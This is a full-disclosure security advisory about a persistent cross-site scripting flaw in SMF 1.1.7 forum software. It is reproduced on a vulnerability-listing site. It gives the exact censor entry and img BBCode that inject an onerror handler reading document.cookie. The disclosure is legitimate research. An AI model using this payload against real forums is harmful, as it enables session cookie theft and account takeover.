Security Advisory: SMF 1.1.7 Persistent XSS (requires permision to edit censor)

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  flatnux Flatnux-2009-01-27 Remote File Include
  metabbs 0.11 Change admin password vulnerability
  phpslash <= 0.8.1.1 Remote Code Execution Exploit
  rgboard v4 (07.07.27) Multiple Vulnerability

From: Eduardo Vela <sirdarckcat_(at)_gmail.com>
Date: 05.02.2009
Subject: SMF 1.1.7 Persistent XSS (requires permision to edit censor)

SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />

Notes:
- SMF is not using httpOnly cookies.
- I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/

test server